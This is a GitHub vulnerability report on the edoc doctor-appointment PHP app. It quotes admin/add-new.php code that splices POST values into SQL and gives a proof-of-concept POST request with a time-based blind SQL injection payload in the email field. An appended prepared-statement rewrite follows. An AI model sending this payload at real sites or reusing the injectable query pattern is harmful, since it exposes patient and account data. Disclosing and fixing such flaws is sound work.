HashenUdara / edoc-doctor-appointment-system

This PHP-based open source project is a web application for booking medical appointments. Patients can use the platform to easily schedule appointments with their doctors, saving time and effort. The project's source code is open for anyone to use, modify, and distribute according to their needs.
MIT License

Found a vulnerability #30

Open KillerFr0st opened 1 year ago

KillerFr0st commented 1 year ago

In admin/add-new.php from line 47, the $email parameter is controllable: the email parameter can be passed through POST, and $email is not protected from SQL injection. Line 54, $result= $database->query("select * from webuser where email='$email';");, causes SQL injection.

    if($_POST){
        //print_r($_POST);
        $result= $database->query("select * from webuser");
        // every value below comes straight from the request body, unvalidated
        $name=$_POST['name'];
        $nic=$_POST['nic'];
        $spec=$_POST['spec'];
        $email=$_POST['email'];
        $tele=$_POST['Tele'];
        $password=$_POST['password'];
        $cpassword=$_POST['cpassword'];

        if ($password==$cpassword){
            $error='3';
            // $email is interpolated into the query unescaped: the injection point from the report
            $result= $database->query("select * from webuser where email='$email';");
            if($result->num_rows==1){
                $error='1';
            }else{

                // the inserts interpolate the same request values; $spec is not even quoted
                $sql1="insert into doctor(docemail,docname,docpassword,docnic,doctel,specialties) values('$email','$name','$password','$nic','$tele',$spec);";
                $sql2="insert into webuser values('$email','d')";
                $database->query($sql1);
                $database->query($sql2);

                //echo $sql1;
                //echo $sql2;
                $error= '4';

            }

        }else{
            $error='2';
        }

    }else{
        //header('location: signup.php');
        $error='3';
    }

PoC

POST /admin/add-new.php HTTP/1.1
Host: 192.168.0.104
Content-Length: 61
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.0.104
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.70
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.104/admin/doctors.php?action=add&error=3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: PHPSESSID=mpu5jiv1ln63f3hrl1avff7if7
Connection: close

name=1&email=' AND (SELECT 7810 FROM (SELECT(SLEEP(5)))POrN) AND 'FCcW'='FCcW&nic=4&Tele=5&spec=1&password=6&cpassword=6

Attack results pictures

[image]
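One way to close the hole described in this report, added here as an example and not taken from the project: the same handler rewritten so that every request value, not only $email, reaches MySQL as a bound parameter of a prepared statement. It assumes $database is the project's mysqli connection object, as the posted code implies, and that webuser has the two-column layout the original insert relies on.

```php
<?php
// Added example, not the project's code: admin/add-new.php's handler with every
// request value bound through a mysqli prepared statement, so no input is ever
// spliced into query text. Assumes $database is the project's mysqli connection.

function add_doctor(mysqli $database, array $post): string
{
    $name      = $post['name'] ?? '';
    $nic       = $post['nic'] ?? '';
    $spec      = (int) ($post['spec'] ?? 0); // numeric column in the original insert
    $email     = $post['email'] ?? '';
    $tele      = $post['Tele'] ?? '';
    $password  = $post['password'] ?? '';    // handled as the original does; only the SQL changes
    $cpassword = $post['cpassword'] ?? '';

    if ($password !== $cpassword) {
        return '2'; // same error code the original uses for a mismatch
    }

    // Existence check: the email is a bound parameter, so a value such as
    // ' AND (SELECT SLEEP(5)) AND 'x'='x is compared literally against the column.
    $stmt = $database->prepare('SELECT 1 FROM webuser WHERE email = ?');
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->store_result();
    $exists = $stmt->num_rows === 1;
    $stmt->close();
    if ($exists) {
        return '1';
    }

    $stmt = $database->prepare(
        'INSERT INTO doctor (docemail, docname, docpassword, docnic, doctel, specialties)'
        . ' VALUES (?, ?, ?, ?, ?, ?)'
    );
    $stmt->bind_param('sssssi', $email, $name, $password, $nic, $tele, $spec);
    $stmt->execute();
    $stmt->close();

    // Same two-column layout the original "insert into webuser values(...)" relies on.
    $stmt = $database->prepare("INSERT INTO webuser VALUES (?, 'd')");
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $stmt->close();

    return '4';
}

$error = $_POST ? add_doctor($database, $_POST) : '3';
```

With the PoC body from this report, the existence check now looks up a user whose email literally equals the payload string and returns no row, and no SLEEP() is evaluated.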